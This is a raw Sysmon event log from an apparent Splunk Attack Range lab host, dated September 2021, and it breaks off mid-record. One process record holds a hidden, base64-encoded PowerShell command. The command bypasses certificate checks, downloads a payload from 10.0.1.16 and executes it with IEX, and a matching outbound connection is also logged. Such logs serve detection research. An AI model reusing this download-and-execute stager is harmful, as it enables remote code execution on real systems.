15:09:04.076{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7510-613B-79B4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.076{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7510-613B-79B4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:04.061{B81B27B7-7510-613B-79B4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:05.978{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE07DC281E97D287C9D631E856AB1E72,SHA256=8A179DE8E3AD6EA35614B6DD8A729FE7A9688C803E68E3536EE56F3AF17A0416,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:05.075{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=704702AFEBB71A9546F0CF7C8AF20BFA,SHA256=E9804D2A933485E981704199451139ACA204C86DDE5A80CC829C5F71F17FFE12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:05.075{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3517A1A00852DA6C922A06BF8A3E08F7,SHA256=E118C71723E1EF30A0C6512BEBC9D0FDAF89ED63AF73AA5D35090AA1A2593A13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:06.993{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8E278CE16A4CB0529518CF69102F12F,SHA256=231E12E2FCF31FA48D2DF42A4D7D2D913D9A3DD78AD05B3694821C1C6F883BA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:32.051{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52654-false10.0.1.12-8000- 354300x800000000000000035344231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:33.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52655-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:08.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A891E38EA3A9384A5D0281EE98E2B7D7,SHA256=D0E81817DD4DB6AC7CEF0584A26896415020C785A93B6BF1949E9B013F379ACF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:08.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=14922DDD1B5992FB21F60B0D0B747786,SHA256=B53C4392CDFD343ED4DCEBDC388F27A942395B70B4C03F3C264BD13A9CFFB9BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:09.028{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64914CBE25C00A0AC1C45BB1538FA576,SHA256=51B48CD5FCA06CE20EEC47ADE20EA767A04D7F38630D78A0FA272CCBF8E0B0F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:10.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A312CFDB8E9FF2A58A993CEC594CF265,SHA256=CB64223B4C1DA03FA71997FC4A01BC6074F59A8976C85C0BD887529C6A6D8481,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:37.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52656-false10.0.1.12-8000- 23542300x800000000000000035344234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:11.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FAEE2CFD45B514A332299DFF3346778,SHA256=3F7DF926C23C8BC2903C0DFF0DFFB205E145FA05C3334EEEB09F44B42EE3D725,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.859{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\system32\net.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.859{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\system32\net.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.843{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035344237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.852{B81B27B7-7518-613B-7BB4-03000000C801}5072C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" useC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035344236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:12.091{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899BC5472679C951913441386DB48796,SHA256=FDDE31A00C77FD89EED6255E39CA6FC189B0CDF86979098D9DC3AA2C432A59B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:13.863{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 